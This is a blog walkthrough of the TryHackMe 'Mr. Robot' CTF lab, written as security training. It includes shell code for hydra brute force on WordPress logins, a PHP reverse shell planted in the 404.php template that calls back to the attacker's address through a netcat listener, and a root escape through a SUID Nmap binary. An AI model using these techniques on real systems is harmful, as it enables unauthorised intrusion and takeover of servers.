This post is a walkthrough of the famous Mr. Robot CTF virtual machine. I used the TryHackMe platform, though you can also find this VM on Vulnhub. The goal is to find three hidden flags.
Let's get started by deploying the machine. Once it is up, start with a basic Nmap scan to see which ports and services are open on the target IP address.
Nmap Scan:
Ports 80 and 443 being open means a website is running, so we open http://10.10.24.7 and https://10.10.24.7 in the browser.
The site is Mr. Robot themed: typing the commands listed on the landing page just redirects to other pages with images and videos from the Mr. Robot TV show.
Now that we know it is a website, we enumerate its directories with a gobuster scan and follow the basic enumeration steps, such as checking whether a robots.txt page exists.
Gobuster Scan
Gobuster takes a wordlist of common directory names, requests every entry from the web server and reports the HTTP status code of each response. (On Kali or ParrotOS you can find these wordlists under /usr/share/wordlists/dirbuster.)
Now let's check the directories that returned a status code 200.
Here, in the license directory, we got a base64-encoded string. Let's decode it and see what we get.
This could be a set of login credentials for the wp-admin page, but before testing that we should look at the robots.txt file, as it might contain some valuable information.
As we can see, the robots.txt file contains very valuable information: it lists a dictionary named fsocity.dic and the first flag, key-1-of-3.txt. Let's visit both paths and download the dictionary, so that if the username and password turn out to be incorrect we can run a dictionary attack on the login page with hydra.
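The enumeration steps above (Nmap scan, gobuster, preparing fsocity.dic for hydra) as shell functions. This is an added example, not code from the original writeup; the target address, the wordlist path, the `TARGET` variable and the WordPress error strings used as hydra failure markers are assumptions, and the sample dictionary in the demo is constructed, not the real fsocity.dic. One practitioner detail the writeup does not mention: fsocity.dic repeats the same words many times, so deduplicating it with `sort -u` before handing it to hydra cuts the attack time substantially.

```shell
# Added example (not from the original writeup). TARGET and WORDLIST are assumptions.
TARGET="${TARGET:-10.10.24.7}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}"

# Basic service scan of the box: version detection plus default scripts, saved to a file.
scan_target() {
  nmap -sV -sC -oN "nmap_${1:-$TARGET}.txt" "${1:-$TARGET}"
}

# Directory brute force; -x also tries common file extensions for each word.
dir_bruteforce() {
  gobuster dir -u "http://${1:-$TARGET}" -w "$WORDLIST" -x php,txt -o "gobuster_${1:-$TARGET}.txt"
}

# fsocity.dic contains the same words over and over; feeding it to hydra as-is only
# multiplies the run time. sort -u keeps one copy of each line and the unique count
# is returned on stdout.
dedup_wordlist() {
  local in="$1" out="$2"
  sort -u "$in" > "$out"
  wc -l < "$out" | tr -d ' '
}

# Username enumeration against wp-login.php. WordPress answers an unknown user with
# "Invalid username" and a known user with a different message, so hydra's F= failure
# string separates the two. Verify the exact text with one manual login attempt first.
wp_enum_users() {
  local host="$1" dict="$2"
  hydra -L "$dict" -p x "$host" http-post-form \
    "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username"
}

# Password attack for one user found above (failure string is an assumption; check it).
wp_bruteforce_password() {
  local host="$1" user="$2" dict="$3"
  hydra -l "$user" -P "$dict" "$host" http-post-form \
    "/wp-login.php:log=^USER^&pwd=^PASS^:F=The password you entered for the username"
}

# Demo on a constructed dictionary (not the real fsocity.dic): 7 lines collapse to 4.
demo_dedup() {
  local dir
  dir="$(mktemp -d)"
  printf 'true\nfalse\nwikia\ntrue\nfrom\nwikia\ntrue\n' > "$dir/sample.dic"
  dedup_wordlist "$dir/sample.dic" "$dir/sample_unique.dic"
  rm -rf "$dir"
}
demo_dedup   # prints 4
```

Only `demo_dedup` runs by default; `scan_target`, `dir_bruteforce`, `wp_enum_users` and `wp_bruteforce_password` need the VPN connection and the target up, so call them explicitly once you are connected.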
Now let’s go to the login page and enter the credentials we found earlier in the license directory.
After logging in we can see that it is a WordPress site, version 4.3.1. In this scenario the usual approach is to upload a reverse shell: we paste pentestmonkey's PHP reverse shell into Appearance → Editor and select 404.php on the right.
You just have to change the IP address to your own IP address and the port to any port you like.
You can find your IP address with the ifconfig command; the tun0 interface carries your VPN address.
After changing the IP address and port number, paste the script into the edit section of 404.php.
Now save the template and start a netcat listener on your chosen port (9999 in my case) by running the following command in the terminal:
nc -nlvp 9999
Now either visit the 404.php page in the browser or request it with curl from the terminal to trigger the reverse shell.
Check the netcat window: the reverse shell should have connected.
As you can see, we need to be the user robot to read key-2-of-3.txt, but we can still read the password.raw.md5 file, so let's do that.
Since the file name tells us it is a raw (unsalted) MD5 hash, let's try to crack it using the CrackStation website.
After getting the password for the user robot, let's switch to that user.
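The reverse-shell steps above (find the tun0 address, set the callback in pentestmonkey's php-reverse-shell.php, listen, trigger the 404 template) as shell functions. This is an added example, not code from the original writeup or from pentestmonkey; the interface name, the port, the two placeholder lines (`$ip = '127.0.0.1';` and `$port = 1234;`) that the shell script ships with, and the stub file used in the demo are assumptions or constructed. It also adds the check the writeup skips: once the shell arrives it has no tty, and `su` refuses to run without one, so the shell needs upgrading before switching user.

```shell
# Added example (not from the original writeup). Interface, port and paths are assumptions.

# Your VPN address: the IPv4 address on tun0 (falls back to ifconfig if ip is absent).
vpn_ip() {
  local iface="${1:-tun0}"
  if command -v ip >/dev/null 2>&1; then
    ip -4 -o addr show "$iface" | awk '{print $4}' | cut -d/ -f1
  else
    ifconfig "$iface" | awk '/inet /{print $2}' | sed 's/^addr://'
  fi
}

# pentestmonkey's php-reverse-shell.php ships with placeholder values
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# This rewrites those two lines so the shell calls back to us, then echoes them so a
# typo is caught before the file is pasted into the WordPress editor.
set_callback() {
  local file="$1" cb_ip="$2" cb_port="$3" tmp
  tmp="$(mktemp)"
  sed -e "s/^\\\$ip = '[^']*';/\\\$ip = '${cb_ip}';/" \
      -e "s/^\\\$port = [0-9]*;/\\\$port = ${cb_port};/" "$file" > "$tmp" && mv "$tmp" "$file"
  grep -E '^\$(ip|port) = ' "$file"
}

# Listener for the callback: -n no DNS, -l listen, -v verbose, -p port.
start_listener() { nc -nlvp "$1"; }

# Trigger the 404 template. Any URL that does not exist is served by 404.php, so the
# path does not matter; --max-time stops curl from hanging once the shell is open.
trigger_404() { curl -s --max-time 5 "http://$1/this-page-does-not-exist" >/dev/null; }

# The shell netcat receives has no tty and `su robot` will fail without one.
# Upgrade it in the netcat window with:
#   python -c 'import pty; pty.spawn("/bin/bash")'

# Demo on a constructed stub (only the two lines that matter, not the full script).
demo_patch() {
  local f
  f="$(mktemp)"
  cat > "$f" <<'EOF'
<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
  set_callback "$f" 10.8.0.5 9999
  rm -f "$f"
}
demo_patch
```

Typical order: `vpn_ip` to get the address, `set_callback php-reverse-shell.php "$(vpn_ip)" 9999`, paste the file into 404.php, `start_listener 9999` in one terminal and `trigger_404 10.10.24.7` in another.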
Switching user to robot
Privilege Escalation
Now, to capture the 3rd flag we need to escalate from user to root. For this we need to find which programs have the SUID bit (permission 4000) set.
The trick here is that Nmap has the SUID bit set. Administrators sometimes set the SUID bit on nmap so that non-root users can run it with full functionality, because several Nmap scanning techniques (SYN scans and OS detection, for example) need raw sockets and therefore root privileges.
However, older Nmap versions have an interactive mode that lets you escape to a shell. If Nmap has the SUID bit set, it runs with root privileges, and we can get a root shell through its interactive mode.
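The SUID hunt and the Nmap interactive-mode escape as shell functions, with the check a practitioner wants before relying on it: the `--interactive` option only exists in Nmap 2.02 through 5.21, and the binary must be SUID and owned by root. This is an added example, not code from the original writeup; the version string in the demo is constructed and the flag location under /root is an assumption.

```shell
# Added example (not from the original writeup). Paths are assumptions.

# List files with the SUID bit set below a directory (default: the whole filesystem).
# -perm -4000 matches any mode that includes the set-user-ID bit; permission errors
# from unreadable directories are discarded.
find_suid() {
  find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# Pull "3.81" out of the first line of `nmap --version`
# ("Nmap version 3.81 ( http://www.insecure.org/nmap/ )").
nmap_version_from() {
  printf '%s\n' "$1" | awk '/^Nmap version/ {print $3; exit}'
}

# --interactive exists in Nmap 2.02 through 5.21 and was removed afterwards, so the
# escape only works in that range. Returns 0 when the version is inside it.
nmap_has_interactive() {
  local n
  n="$(printf '%s' "$1" | awk -F. '{print $1*1000 + $2}')"
  [ "$n" -ge 2002 ] && [ "$n" -le 5021 ]
}

# Decide whether a found binary is usable: SUID, owned by root, and a version
# that still has --interactive.
nmap_escape_possible() {
  local bin="$1" ver
  [ -u "$bin" ] || return 1
  [ "$(stat -c %U "$bin")" = "root" ] || return 1
  ver="$(nmap_version_from "$("$bin" --version)")"
  nmap_has_interactive "$ver"
}

# The escape itself, typed at the prompt after running `nmap --interactive`:
#   nmap> !sh
#   # id
#   uid=...(robot) gid=...(robot) euid=0(root) ...
# `!` runs a command through the shell; because the binary is SUID root the child
# inherits euid 0. Check with `id` rather than `whoami` alone so the effective uid is
# visible, then read the third key (assumed to live under /root).

# Demo: a constructed version line, as printed by an old nmap build.
demo_version_check() {
  local ver
  ver="$(nmap_version_from 'Nmap version 3.81 ( http://www.insecure.org/nmap/ )')"
  if nmap_has_interactive "$ver"; then
    echo "nmap $ver: --interactive available"
  else
    echo "nmap $ver: no --interactive, look for another SUID binary"
  fi
}
demo_version_check
```

On the box the full sequence is `find_suid` to spot the nmap binary, `nmap_escape_possible /usr/local/bin/nmap` (path is an assumption, use whatever `find_suid` printed), then `nmap --interactive` and `!sh`.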
Personal conclusion over tryhackme
Personally, I've had an amazing time in this room and learned a lot. TryHackMe has tons of other rooms, each different from the others, which gives a huge learning opportunity as well. I'll try to upload writeups of rooms that I find interesting, but for now I hope you also learned something from this writeup.
Get the latest tech news and updates, ethical hacking tutorials and cybersecurity tips and tricks. Check out MeuSec for more.
Sometimes we include links to online retail stores and/or online campaigns. If you click on one and make a purchase we may receive a small commission.
Comments:
6 replies on “TryHackMe — Mr. Robot CTF Writeup”
"Appreciating the time and effort you put into your blog and the in-depth information you provide. It's awesome to come across a blog every once in a while that isn't the same old rehashed information. Fantastic read! I've bookmarked your site and I'm adding your RSS feeds to my Google account."
Putin
You are actually a good webmaster. The website loading velocity is amazing. It seems that you are doing any distinctive trick. In addition, the contents are masterpiece. You've done an excellent process on this subject.
Regards Hannah Flack
Attractive section of content. I just stumbled upon your site and in accession capital to assert that I acquire in fact enjoyed account your blog posts. Anyway I will be subscribing to your augment and even I achievement you access consistently fast.
I would like to thank you for the efforts you have put in writing this blog. I am hoping the same high-grade blog post from you in the upcoming as well. In fact your creative writing abilities have inspired me to get my own blog now. Really the blogging is spreading its wings quickly. Your write-up is a good example of it.
Thanks a lot mate.
It's in reality a great and helpful piece of information. I am glad that you shared this useful info with us. Please keep us informed like this. Thank you for sharing.